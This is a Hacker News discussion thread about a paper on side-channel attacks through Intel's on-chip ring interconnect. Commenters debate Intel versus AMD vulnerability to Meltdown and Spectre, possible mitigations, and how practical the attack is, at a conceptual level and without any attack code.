Hacker News new | past | comments | ask | show | jobs | submit login
Lord of the Ring(s): Side Channel Attacks on the CPU On-Chip Ring Interconnect (arxiv.org)
188 points by nixgeek 37 days ago | hide | past | favorite | 55 comments



>Finally, AMD CPUs utilize other proprietary technologies known as Infinity Fabric/Architecture for their on-chip interconnect. Investigating the feasibility of our attack on these platforms requires future work. However, the techniques we use to build our contention model can be applied on these platforms too.

I notice often that when coverage of these side-channels start spreading Intel takes a hit and AMD thrives. While the majority of these side-channel attacks are tuned to Intel chips, the theory behind them along with a decent amount of work can often make them applicable to AMD as well, and in some cases even other architectures(ARM, MIPS, SPARC, etc).


Yep. I wish I could remember the details, but in one of the episodes of the On The Metal podcast they talked to someone who backported meltdown/spectre to a bunch of CPUs which are decades old, or really exotic.

I don’t know why, but there’s something really surprising to me about how far reaching the issues are, when you pull them back to first principles.


A big difference between impact on Intel and AMD was due to only part of the recent attacks being a new class opening new ground - namely the generic speculative execution part.

A big group that turned it into "Intel fail" was due to various errors on Intel part, like moving verification of memory accesses to instruction retirement and similar things that even to uneducated person like me look like "tricks to make single-core performance shine".


Not sure if the checks of all loads are done at instruction retirement, but yes they are done after the (speculative) execution of the load.

We can also talk about the Store-to-Load Forwarding involving a partially check physical address, exploited by the Fallout attack, which is an optimization patented by Intel since 2006 [1]. All these Intel optimizations are old, and sometimes patented (which reduces the chance that IBM, ARM or AMD will do the same) and are totally valid and safe as long as it's assumed that it is impossible to recover data used during the speculative execution.

The recovery of this data becomes possible only when the side channel Flush+Reload is discovered in 2014 [2] (which originally didn't target speculative executions). It is only 3 years later that Meltdown attack use Flush+Reload as a covert channel to exfiltrate data during speculative execution.

It seems to me that this timeline shows that it was not possible in 2006 to anticipate this issue. So it's not just a lack of education.

Perhaps a lack of security research at Intel to continuously challenge their optimizations?

But please note that there is no theory to simply determine whether these optimizations are a good idea or not. Criticism is easier afterwards when you know how the attacks are produced. But in 2017 this type of attack was something new.

That said, some of Intel's responses to the flaws (partial correction of vulnerabilities, lack of dialogue with researchers, etc.) are very worrying and I think these criticisms are much more legitimate.

[1] : https://patents.google.com/patent/US20080082765A1

[2] : https://eprint.iacr.org/2013/448.pdf


Thanks for the in-depth explanation!

I will admit that I'm not an expert in microarchitecture design, so to me the expected flaw would be "we do something wrong in speculative execution and end up bypassing the checks in destructive way", not through side channels. Didn't know about patents involved. And of course timing attacks make everything worse for all of us :/


Those weren't Intel fails - no CPU manufacturer had any kind of generic rule against that sort of microarchitectural optimisation and it's hard to imagine what sort of rule would have blocked such optimisations by policy which wouldn't also rule out all speculative execution. The only reason AMD wasn't hit by Meltdown too is their cores are/were less optimised.


Moving memory access verification to instruction retirement is the kind of risky optimization one should beware immediately, even if spectre and the like weren't yet known. If only because the risks if you get it wrong are that much higher.


Ok, but "Intel fail" indicates meltdown was specific to Intel processors, when it was also present of IBM and some Arm designs.


I specifically separated the "new class of microarchitecture timing attacks", which was common across many systems (including AMD, POWER and ARM), from "Intel fail" where too aggressive optimization tricks did turn out to be bad idea.


What specific optimization are referring to? The one you mentioned, moving access auth checks to retirement, was something both ARM and POWER did.


Neither ARM nor POWER did that - they had timing side channel from speculative execution (i.e. whether a branch was taken or not).

What Intel did was put all memory access auth checks to retirement, so appropriately crafted code could bypass protection bits in TLB, not just snoop elements of cache (AMD, ARM, POWER)


Yes, they did.

Intel's implementation of checking permissions in parallel with speculative loads was vulnerable because the transient effects could be observed through cache timing information.

All of these attacks, meltdown included, use "timing side channels from speculative execution."

POWER9 had the same problem (and therefore was similarly vulnerable to meltdown) for memory accesses that hit in the L1. i.e. userspace accesses to kernel addresses cached in the L1 could produce observable data-dependent effects because the data was available for further speculative execution before the permission exception was raised. This is why the Linux kernel put in place a mitigation for meltdown on POWER CPUs that involves flushing the L1-D cache on transitions to/from kernel space ("RFI flush").

To be clear, the vulnerability that Intel processors have because they "move memory access verification to instruction retirement" is called "meltdown." When I said that meltdown was present on IBM and some Arm designs, I meant that these designs are vulnerable to the same exploit because they have comparable problems with regard to memory permission checks. I was not referring to the various other spectre-type vulnerabilities, which are even more widespread.

So to summarize:

Ok, but "Intel fail" indicates meltdown was specific to Intel processors, when it was also present of IBM and some Arm designs.


"Too aggressive" is just, like, your opinion, man. There are tons of workloads where only maximum throughput or lowest latency are important and the operators of those systems don't care one jot about side channel attacks.


And PC / general-purpose CPUs aren't such a workload.


They aren't?

I know a significant number of people who have disabled spectre and meltdown protections in favor of higher performance because they are not concerned at all about side channel attacks.

Single tenant workloads that run no untrusted code that are not public facing are not exactly a unicorn.


> The only reason AMD wasn't hit by Meltdown too is their cores are/were less optimised.

That doesn't answer whether they were less optimized because someone on the Red team realized that was a good idea.


There's clearly no such red team, as otherwise they would have blocked various Spectre attacks too, being as they are all variants of the same problem. AMD were taken by surprise like every other vendor, they just got "lucky" with Meltdown.


That was Jon Masters who led the technical Spectre/Meltdown response for Red Hat, and was talking about porting it to SPARC, and Itanium, and maybe others as well

https://oxide.computer/podcast/on-the-metal-8-jon-masters/


Intel CPU's are more widely deployed, especially on the types of systems under more attack. That's why attacks are designed for them.


Considering the shift to AMD from Intel that has happened over the last couple years it will be interesting to see if we'll see AMD as more of a priority target in the future. AMD has certainly been leading in sales in most demographics for the last year or two, and there's little sign of Intel closing that gap. AMD has even made some moves recently that indicate some desire to chase Intel out of the lead in the few niches they still control, like the x86 low power/cost device market that has been dominated by atom/celeron.


Turns out exploiting these issues seems to be easier on Intel. Perhaps since it's so dominant, Intel is where the majority of the research is focused. But perhaps, the huge architectural differences which made Intel more vulnerable to more Spectre variants are responsible. It's clear Intel has been taking many shortcuts with its CPU design in favor of speed and has been for decades.


Because AMD has a tiny market share. Trust me, if AMD would be on top, it would be riddled with holes, just like Intel


https://www.techspot.com/news/87436-amd-chipping-away-intel-...

After checking a few sites, it looks like AMD may have between 20 and 37% of PC market share. I do not consider that "tiny."


In the server market Intel had 92.9% for Q4 2020. AMD is actually up a lot in that market, Intel had 95.5% in 2019, but outside of a few specific use cases Intel still owns the market most likely to contain interesting information an attacker might want.

This attack as it stands does not seem to apply to Intel server hardware from Skylake to present due to a different interconnect architecture, though the researchers indicate a belief the attack may be portable it would also be more limited.

Complete rectal estimation here, but I'd imagine executive laptops to probably be the next juiciest target as the end user station most likely to contain "interesting" data. While AMD has been making incredible inroads in the laptop market with Zen 2 and especially Zen 3, as opposed to the Bulldozer era when seeing an AMD sticker on a laptop let you know it was the cheapest one on the shelf, they still haven't made it to the models commonly bought by businesses.

AMD is absolutely killing it in the DIY desktop space, deservedly so (this post typed from a 3900X that I love), but on the OEM side of things you still generally have to go out of your way to find them in anything not marketed at gamers.


It's true. I've read one side channel attack paper that admitted towards the end that the researchers didn't actually even have access to AMD hardware to test with, but thought it should work in principle.

Fact is Intel takes the brunt of these attacks because their HW is more available especially in semi-standardised environments like universities. Also, Intel fund researchers (this paper was part funded by Intel), and their technical documentation is better than AMDs, at least in my experience. That makes it easier to understand the CPU internals, which is a big part of these papers.


This is a great paper, really well explained. The source code: https://github.com/FPSG-UIUC/lotr

The TL;DR is that the L3 cache (LLC: Last Level Cache) is shared between all cores on the chip, but the L3 is composed of a number of slices colocated with each core: the L3 is actually CC-NUMA! There is contention when reading/writing to the L3 via the ring interconnect, which can be used to identify the memory addresses access patterns of the cache. There's a bit more covering how the L1/L2 caches, private to each core, are revealed via the set inclusivity properly of Intel's cache design.

In monitoring LLC it is similar to https://eprint.iacr.org/2015/898.pdf though it doesn't reference them.

It isn't a game over attack but it reinforces how sharing resources (cache, memory, cores) is a bad idea when that crosses a security boundary. VM exclusive cache regions (Intel CAT cache partitioning) and cache locking should help, but cache slice partitioning is reqd too.


We should just stop running multiple programs on the same hardware.


Alternatively: maybe eliminating observable side-effects from cache behavior by restricting accurate timing information to privileged processes is the way to go. Though I imagine that's a lot easier done at the level of, say, a Javascript interpreter than at the level of raw machine code. There's probably a lot of indirect ways of figuring out how long something took when you can run arbitrary instructions and/or you're allowed to run multiple threads that share memory. Even being able to launch two threads and find out which one finished first can be used to construct a crude stopwatch.


Yea, that's a good way to go in the medium term. I like the Mill design, where every fetch from memory can return NaR (Not a Result, which is a little like a floating–point NaN), and all operations on a NaR take the same amount of time as normal but pass the NaR through. Also, they made sure to put the memory protection _before_ the cache, so when you don't have access to the memory you get the NaR before it even consults the cache. Looks like there are some nice performance benefits too.

In the long term though? Who knows. Separate cpu+cache+memory hardware for every process seems a little crazy, but the alternatives might be worse.


> or you're allowed to run multiple threads that share memory.

Indeed, you can always spawn a helper thread that does nothing but incrementing a counter on shared memory and use that as clock substitute. That's why browsers disabled shared arrays after spectre was revealed.

So this isn't practical for any programs that need fine-grained parallelism.


And for additional security, reduce the program count by one beyond that.


Perhaps we should stop running multiple programs on the same hardware at the same time while making sure information isn't leaked between domains?

If the future provides us with large but thermally limited dies, I could see a scenario where CPU components are duplicated but not all running at once. A thread or set of threads could own a hierarchy of caches, for example. Caches are die-intensive, so I don't see this happening soon, but maybe at some point in the future.


it seems like it might be totally feasible to make a CPU where one core runs all the Ring 0 stuff, and the rest don't.


You don't really need a CPU to do that. Just operating system decisions.

a) route all hardware interrupts to CPU 0 only

b) when a user thread does a syscall, immediately task switch to another thread, marking the current thread as entering/in the kernel. Only service threads entering/in the kernel on CPU 0.

Technically, you need a little bit of ring 0 time to task switch. But if you make all of the syscalls amazingly slow, timing attacks are a lot harder.


There are some patches out there that allow you to lock kernel threads to particular cores.

With all the cache flushes on context switch, making syscalls slow should be no problem at all.


My memory could very well be wrong here, but isn't this how multi-core was first implemented on FreeBSD, with all post-context-switch kernel code running on CPU0? It's certainly a much more simple design, easier to avoid data races and deadlocks. However, I believe the performance penalties were pretty apparent early on, even on 2-4 core systems.


I wasn't that understanding of kernel stuff back then, but I don't recall seeing anything that the kernel was always running on CPU0; but I think everything was behind the GIANT lock, so there was effectively zero kernel concurrency.


I like that idea!

There's already a large slowdown because of communication and NUMA. The syscall arguments have to be transferred to CPU 0 memory as well.


I just skimmed a little bit of the paper so I'm probably missing a lot of context, but would restricting to one core even help in this instance? Information is leaking via the L3 cache, which is shared.


Original iOS and iPads were right - you should only be able to see a single piece of software and everything else should stop. This will make you safe and secure.


> VM exclusive cache regions and cache locking should help, but cache slice partitioning is reqd too.

Note that in this instance the shared region is the bus used to access the cache. Reserving a cache region won't help with that. One would have to reserve time slices on the bus.


But if the cache is in a different set, and each security partition has exclusive access to particular slices, you can't get contention because access is forbidden.

Also, time slicing might not be sufficient due to the queues in each LLC slice. If you can fill the queue the bus access will retry I guess.


Note that the implementation of EdDSA that the authors investigated (libgcrypt) is not a constant-time implementation. Better implementations are more likely to be safe.

See: https://news.ycombinator.com/item?id=21352821


I've read a lot of side channel papers like this one over the past few years. Here are some thoughts.

Firstly, this new technique is probably not exploitable against 'real' cryptographic software. A very common technique in these papers that I see all the time these days is they attack obsolete versions of libgcrypt, because old versions of this relatively obscure crypto library aren't using constant time code. All modern and patched crypto implementations that people actually use would not leak using this technique, as the paper admits at the end. And even libgcrypt was patched years ago. The version number cited in the papers never makes this clear - you have to look up the release history to realise this.

Secondly, this paper is a bit unusual in the sheer number of steps that are simulated or otherwise simplified by e.g. requiring root. It's got some work to do before it's usable outside of lab condition demonstrations.

OK, so the crypto attack is theoretical and wouldn't work in real life, but what about the ability to extract passwords from typing patterns? Well, if we read that part of the paper carefully we can see a rather massive caveat: all it takes is 2 threads doing stuff in the background and the signal is drowned in noise. 4 threads doing stuff cause the signal to be entirely lost. So there seems to be a simple mitigation and it's unclear that this would work at all on a server that's under even moderate load.

Moreover, whilst a casual reader may get the impression they can extract passwords, they don't actually demonstrate that. Rather, they demonstrate what they claim is "a very distinguishable pattern" in ring contention triggered by keystrokes, with "zero false positives and zero false negatives". That sounds impressive but no information is given on what they're comparing against: what were the other events that were being tested here? The obvious question in my mind is how much of the signal they're seeing came from the actual keystroke vs output being printed to a terminal emulator, in which case, I'd expect to see potential FPs caused by any printing to the terminal. Their victim program doesn't merely monitor keystrokes but they are also echoed to the terminal - which is not what happens during password input, where characters aren't visible. This mock victim program is not much like a real password input program as a consequence.

Overall it's a clever paper, but I find myself increasingly fatigued by this genre of research. They seem to have settled into a template:

• Attack Intel, ignore everything else.

• Make grand and scary sounding claims

• Only demonstrate them against deliberately crippled victim programs in very artificial conditions.

It's been a few years now and I don't think any Spectre attack has ever been spotted in the wild, mounted by real attackers. That's true despite a huge state-sponsored attack having just been detected, that Microsoft claim might have had over 1000 developers work on it. Uarch side channel attacks sound cool but it seems real attackers either can't make them work, or have easier ways to get what they want. I find myself losing interest as a consequence.


I am an author of the paper. Great question on the signal of the actual keystroke vs output being printed to a terminal. We did test that, and the attack works perfectly also without ECHOing characters in the terminal emulator (i.e., printing to the terminal is not a requirement).


I agree with most of what you said, but about a Spectre attack having never been spotted in the wild, that seems to be no longer true.

Just a few days ago there were some news about the discovery of the first real malware that had exploited a Spectre variant.

Unfortunately I do not remember where I saw this, but it was said that the Spectre-based malware might have spread for a few months before being identified recently.


Are you perhaps thinking of the CANVAS exploit kit that was leaked from Immunity?

If so, I agree this is a good example, although how 'in the wild' a red team exploit kit can be considered to be is perhaps up for debate.


>It's been a few years now and I don't think any Spectre attack has ever been spotted in the wild

https://dustri.org/b/spectre-exploits-in-the-wild.html

However, I agree on your points. I just hope it makes Intel's share price dip so I can make more money.


Well, not really. See my comment here:

https://news.ycombinator.com/item?id=26306733


Could you explain why "attribution is trivial"?


I, for one, am mostly preoccupied with the covert channel. That one sounds like it's pretty real.


Systems are full of covert channels; can you explain why they would be a security problem to you?


Why do authors use such silly titles as "Lord of the Rings"? There is no mention of it anywhere in the paper besides the title, it just looks childish(to me). Just use the second part of the title as the paper's title, dump the LoTR thing.


strong disagree, it's more memorable


Can it be used to circumvent IME?




Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: